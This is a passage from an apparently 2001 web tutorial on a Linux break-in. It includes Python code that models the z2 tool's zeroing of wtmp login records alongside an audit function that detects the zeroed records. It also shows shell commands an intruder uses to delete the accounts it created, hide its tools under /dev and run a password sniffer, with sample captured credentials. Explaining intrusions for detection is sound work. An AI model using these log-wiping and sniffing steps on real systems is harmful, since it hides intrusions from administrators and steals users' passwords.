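        pack_record(USER_PROCESS, 812, "pts/1", "jroberts", "emaca.here.com", at(20, 29)),
    ])


def zap(wtmp, user):
    """Model of z2: overwrite every record whose ut_user matches with zeros, in place."""
    out = bytearray(wtmp)
    for off in range(0, len(out) - UTMP_SIZE + 1, UTMP_SIZE):
        rec = struct.unpack(UTMP_FMT, out[off:off + UTMP_SIZE])
        if rec[4].rstrip(b"\0") == user.encode():
            out[off:off + UTMP_SIZE] = bytes(UTMP_SIZE)
    return bytes(out)


def audit_wtmp(wtmp):
    """Report zeroed records, a trailing partial record, and the logins that survive."""
    zeroed, logins = [], []
    whole = len(wtmp) // UTMP_SIZE
    for i in range(whole):
        chunk = wtmp[i * UTMP_SIZE:(i + 1) * UTMP_SIZE]
        if chunk == bytes(UTMP_SIZE):
            zeroed.append(i)            # `last` skips these silently; we do not
            continue
        rec = struct.unpack(UTMP_FMT, chunk)
        if rec[0] == USER_PROCESS:
            logins.append((rec[4].rstrip(b"\0").decode(),
                           rec[2].rstrip(b"\0").decode(),
                           rec[5].rstrip(b"\0").decode()))
    return {"records": whole, "truncated": len(wtmp) % UTMP_SIZE != 0,
            "zeroed": zeroed, "logins": logins}


if __name__ == "__main__":
    zapped = zap(zap(build_sample_wtmp(), "jroberts"), "ftp")
    print(audit_wtmp(zapped))
```

After zapping jroberts and ftp the audit reports records 3 and 4 as zeroed while root and john survive, which is exactly the "before" and "after" of the last output above. On a real host the same loop runs over /var/log/wtmp (and /var/run/utmp), and a zeroed record in the middle of the file, rather than at its end, has no innocent explanation.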
The cracker then deletes the two accounts it created, together with their home directories. Note that the tools now live in /dev/hda01, a directory named to pass for a disk device node; regular files and directories under /dev are worth checking for. Deleting the accounts does not undo the adduser lines already written to /var/log/messages, which is why the kit also ships a replacement sysklogd.
[root@server hda01]# export PATH="$PATH:/usr/sbin"
[root@server hda01]# userdel r00t
[root@server hda01]# userdel jroberts
[root@server hda01]# rm -fr /home/jroberts
[root@server hda01]# rm -fr /home/r00t
Finally the cracker starts the sniffer in the background. A little later its log already holds a complete cleartext FTP login, john's user name and password as sent over the wire:
[root@server hda01]# nohup ./linsniffer &
. . .
[root@server hda01]# cat tcp.log
emaca.here.com => server.here.com [21]
USER john
PASS abc123
TUSYST
Y
QUIT
=
----- [FIN]
[root@server hda01]#
The cracker could automate the transfer of the linsniffer logs or log in periodically, unseen, to collect them; every telnet, FTP and r-service password that crosses this network segment ends up in them. At this point the cracker can move around completely invisibly to the real system administrator and do whatever they want (almost...).
This page last updated 2001/10/19 15:54:50.